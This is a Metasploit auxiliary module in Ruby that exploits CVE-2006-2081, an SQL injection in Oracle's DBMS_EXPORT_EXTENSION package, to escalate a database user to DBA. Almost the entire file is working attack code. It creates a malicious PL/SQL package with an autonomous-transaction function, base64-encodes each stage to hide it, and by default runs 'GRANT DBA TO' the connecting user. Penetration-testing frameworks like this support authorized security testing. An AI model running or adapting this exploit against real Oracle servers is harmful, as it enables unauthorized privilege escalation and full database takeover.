metasploit-gs/modules/auxiliary/sqli/oracle/dbms_export_extension.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::ORACLE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle DB SQL Injection via DBMS_EXPORT_EXTENSION',
      'Description'    => %q{
        This module will escalate an Oracle DB user to DBA by exploiting a
        sql injection bug in the DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA package.

        Note: This module has been tested against 9i, 10gR1 and 10gR2.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2006-2081' ],
          [ 'OSVDB', '25002' ],
          [ 'BID', '17699' ],
          [ 'URL', 'http://www.red-database-security.com/exploits/oracle-sql-injection-oracle-dbms_export_extension.html' ],
        ],
      'DisclosureDate' => '2006-04-26'))

      register_options(
        [
          OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]),
        ])
  end

  def run
    return if not check_dependencies

    name  = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
    rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
    rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
    rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)

    package = %Q|
create or replace package #{name} authid current_user is
function ODCIIndexGetMetadata (oindexinfo sys.odciindexinfo,P3 varchar2,p4 varchar2,env sys.odcienv)
return number;
end;
    |

    body = %Q|
create or replace package body #{name} is
function ODCIIndexGetMetadata (oindexinfo sys.odciindexinfo,P3 varchar2,p4 varchar2,env sys.odcienv)
return number is
pragma autonomous_transaction;
begin
execute immediate '#{datastore['SQL']}';
commit;
return(0);
end;
end;
    |

    sploit = %Q|
declare
#{rand1} pls_integer;
#{rand2} number;
#{rand3} varchar(32767);
begin
#{rand2} := 0;
#{rand3} := sys.dbms_export_extension.get_domain_index_metadata('#{name}', '#{datastore['DBUSER']}', '#{name}', '#{datastore['DBUSER']}', '', newblock => #{rand1}, gmflags => #{rand2});
end;
    |

    encoded_package = %Q|
declare
#{rand1} varchar2(32767);
begin
#{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{Rex::Text.encode_base64(package)}')));
execute immediate #{rand1};
end;
    |

    encoded_body = %Q|
declare
#{rand2} varchar2(32767);
begin
#{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{Rex::Text.encode_base64(body)}')));
execute immediate #{rand2};
end;
    |

    encoded_sploit = %Q|
declare
#{rand3} varchar2(32767);
begin
#{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{Rex::Text.encode_base64(sploit)}')));
execute immediate #{rand3};
end;
    |

    # Finally...
    print_status("Sending package '#{name}'...")
    prepare_exec(encoded_package)

    print_status("Sending body '#{name}'...")
    prepare_exec(encoded_body)

    print_status("Attempting sql injection on SYS.DBMS_EXPORT_EXTENSION...")
    prepare_exec(encoded_sploit)

    # Probably should do a 'drop package #{name}'
  end
end